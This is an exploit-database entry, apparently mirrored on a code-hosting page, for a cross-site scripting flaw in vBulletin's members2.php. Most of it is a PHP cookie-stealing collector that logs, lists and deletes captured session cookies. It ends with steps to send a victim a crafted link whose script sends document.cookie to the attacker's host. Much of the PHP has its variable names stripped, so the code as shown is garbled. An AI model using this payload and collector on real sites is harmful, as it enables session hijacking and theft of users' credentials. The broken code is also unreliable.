/exploits/php/webapps/22042.php

https://bitbucket.org/DinoRex99/exploit-database · PHP · 161 lines · 80 code · 52 blank · 29 comment · 1 complexity · 64103a41f5ff63877359b032c92bf025 MD5 · raw file

  1. source: http://www.securityfocus.com/bid/6246/info
  2. Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser.
  3. This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use cookie-based authentication credentials to hijack the session of the legitimate user.
  4. - Run this script on some host:
  5. <?PHP
  6. // vBulletin XSS Injection Vulnerability: Exploit
  7. // ---
  8. // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
  9. // Descrption: Fetching vBulletin's cookies and storing it into a
  10. log file.
  11. // Variables:
  12. = "Cookies.Log";
  13. // Functions:
  14. /*
  15. If (['Action'] = "Log") {
  16. = "<!--";
  17. = "--->";
  18. }
  19. Else {
  20. = "";
  21. = "";
  22. }
  23. Print ();
  24. */
  25. Print ("<Title>vBulletin XSS Injection Vulnerability:
  26. Exploit</Title>");
  27. Print ("<Pre>");
  28. Print ("<Center>");
  29. Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
  30. Print ("Coded By: <B><A
  31. Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
  32. /*
  33. Print ();
  34. */
  35. Switch (['Action']) {
  36. Case "Log":
  37. = ['Cookie'];
  38. = StrStr (, SubStr (, BCAdd (0x0D,
  39. StrLen (DecHex (MD5 (NULL))))));
  40. = FOpen (, "a+");
  41. FWrite (, Trim () . "\n");
  42. FClose ();
  43. Print ("<Meta HTTP-Equiv=\"Refresh\"
  44. Content=\"0; URL=" . ['HTTP_REFERER'] . "\">");
  45. Break;
  46. Case "List":
  47. If (!File_Exists () || !In_Array ()) {
  48. Print ("<Br><Br><B>There are No
  49. Records</B></Center></Pre>");
  50. Exit ();
  51. }
  52. Else {
  53. Print ("</Center></Pre>");
  54. = Array_UniQue (File ());
  55. Print ("<Pre>");
  56. Print ("<B>.:: Statics</B>\n");
  57. Print ("\n");
  58. Print ("^ Logged Records : <B>" . Count (File
  59. ()) . "</B>\n");
  60. Print ("^ Listed Records : <B>" . Count
  61. () . " </B>[Not Counting Duplicates]\n");
  62. Print ("\n");
  63. Print ("<B>.:: Options</B>\n");
  64. Print ("\n");
  65. If (Count (File ()) > 0) {
  66. ['Download'] = "[<A Href=\"" .
  67. . "\">Download</A>]";
  68. }
  69. Else{
  70. ['Download'] = "[No Records in Log]";
  71. }
  72. Print ("^ Download Log : " .
  73. ['Download'] . "\n");
  74. Print ("^ Clear Records : [<A Href=\"" .
  75. . "?Action=Delete\">Y</A>]\n");
  76. Print ("\n");
  77. Print ("<B>.:: Records</B>\n");
  78. Print ("\n");
  79. While (List ([0], [1]) = Each ()) {
  80. Print ("<B>" . [0] . ": </B>" . [1]);
  81. }
  82. }
  83. Print ("</Pre>");
  84. Break;
  85. Case "Delete":
  86. @UnLink ();
  87. Print ("<Br><Br><B>Deleted
  88. Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
  89. Log</B></Center></Pre>");
  90. Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
  91. ['HTTP_REFERER'] . "\">");
  92. Break;
  93. }
  94. ?>
  95. - Give a victim this link: member2.php?s=[Session]
  96. &action=viewsubscription&perpage=[Script Code]
  97. - Note: You can replace [Script Code] with: --
  98. ><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
  99. (document.cookie);</Script>
  100. - Then go to Http://[Exploit Path]?Action=List